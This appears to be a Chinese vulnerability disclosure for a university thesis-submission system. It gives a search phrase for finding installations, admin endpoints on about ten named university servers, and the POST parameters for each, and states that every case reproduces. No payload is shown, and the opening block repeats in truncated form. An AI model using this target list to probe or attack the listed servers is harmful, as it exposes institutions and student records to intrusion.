### 简要描述: rt ### 详细说明: rt ### 漏洞证明: 谷歌搜索:论文授权提交系统 第一处: http://202.120.121.200/tasi/admin/convert/convert.asp?action=querylist http://202.195.243.37/tasi/admin/convert/convert.asp?action=querylist http://202.116.50.25/tasi/admin/convert/convert.asp?action=querylist http://pss.uestc.edu.cn/tasi/admin/convert/convert.asp?action=querylist http://202.120.146.49/tasi/admin/convert/convert.asp?action=querylist http://202.203.222.222/tasi/admin/convert/convert.asp?action=querylist http://paper.sysu.edu.cn/TASi/admin/convert/convert.asp?action=querylist http://202.120.227.60/tasi/admin/convert/convert.asp?action=querylist http://59.72.151.17:8000/admin/convert/convert.asp?action=querylist http://202.197.127.125/tasi/admin/convert/convert.asp?action=querylist POST参数:txtStuName=11&txtStuNo=11&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=undefined&txtMajor=&public=&inputStartDate=&inputEndDate=&catalog=-1&convert=-1 第二处:...
### 简要描述: rt ### 详细说明: rt ### 漏洞证明: 谷歌搜索:论文授权提交系统 第一处: http://202.120.121.200/tasi/admin/convert/convert.asp?action=querylist http://202.195.243.37/tasi/admin/convert/convert.asp?action=querylist http://202.116.50.25/tasi/admin/convert/convert.asp?action=querylist http://pss.uestc.edu.cn/tasi/admin/convert/convert.asp?action=querylist http://202.120.146.49/tasi/admin/convert/convert.asp?action=querylist http://202.203.222.222/tasi/admin/convert/convert.asp?action=querylist http://paper.sysu.edu.cn/TASi/admin/convert/convert.asp?action=querylist http://202.120.227.60/tasi/admin/convert/convert.asp?action=querylist http://59.72.151.17:8000/admin/convert/convert.asp?action=querylist http://202.197.127.125/tasi/admin/convert/convert.asp?action=querylist POST参数:txtStuName=11&txtStuNo=11&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=undefined&txtMajor=&public=&inputStartDate=&inputEndDate=&catalog=-1&convert=-1 第二处: http://202.120.121.200/tasi/admin/authorize/authorize.asp?action=querylist http://202.195.243.37/tasi/admin/authorize/authorize.asp?action=querylist http://202.116.50.25/tasi/admin/authorize/authorize.asp?action=querylist http://pss.uestc.edu.cn/tasi/admin/authorize/authorize.asp?action=querylist http://202.120.146.49/tasi/admin/authorize/authorize.asp?action=querylist http://202.203.222.222/tasi/admin/authorize/authorize.asp?action=querylist http://paper.sysu.edu.cn/TASi/admin/authorize/authorize.asp?action=querylist http://202.120.227.60/tasi/admin/authorize/authorize.asp?action=querylist http://59.72.151.17:8000/admin/authorize/authorize.asp?action=querylist http://202.197.127.125/tasi/admin/authorize/authorize.asp?action=querylist POST参数:txtStuName=11&txtStuNo=11&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=undefined&txtMajor=&public=&inputStartDate=&inputEndDate=&authorize=-1 第三处: http://202.120.121.200/tasi/admin/catalog/catalog.asp?action=querylist http://202.195.243.37/tasi/admin/catalog/catalog.asp?action=querylist http://202.116.50.25/tasi/admin/catalog/catalog.asp?action=querylist http://pss.uestc.edu.cn/tasi/admin/catalog/catalog.asp?action=querylist http://202.120.146.49/tasi/admin/catalog/catalog.asp?action=querylist http://202.203.222.222/tasi/admin/catalog/catalog.asp?action=querylist http://paper.sysu.edu.cn/TASi/admin/catalog/catalog.asp?action=querylist http://202.120.227.60/tasi/admin/catalog/catalog.asp?action=querylist http://59.72.151.17:8000/admin/catalog/catalog.asp?action=querylist http://202.197.127.125/tasi/admin/catalog/catalog.asp?action=querylist txtStuName=11&txtStuNo=11&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=undefined&txtMajor=&public=&inputStartDate=&inputEndDate=&catalog=-1 测试第一处:http://202.120.121.200/tasi/admin/convert/convert.asp?action=querylist POST参数:txtStuName=11&txtStuNo=11&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=undefined&txtMajor=&public=&inputStartDate=&inputEndDate=&catalog=-1&convert=-1 [<img src="https://images.seebug.org/upload/201507/20172139dd732afee97444577f02fbb68fcd36bb.png" alt="QQ图片20150720172127.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/20172139dd732afee97444577f02fbb68fcd36bb.png) 测试第二处:http://202.195.243.37/tasi/admin/authorize/authorize.asp?action=querylist POST参数:txtStuName=11&txtStuNo=11&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=undefined&txtMajor=&public=&inputStartDate=&inputEndDate=&authorize=-1 [<img src="https://images.seebug.org/upload/201507/201722212964e6f4d4d5a2deb38d88067643dbe0.png" alt="QQ图片20150720172212.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/201722212964e6f4d4d5a2deb38d88067643dbe0.png) 以上均可复现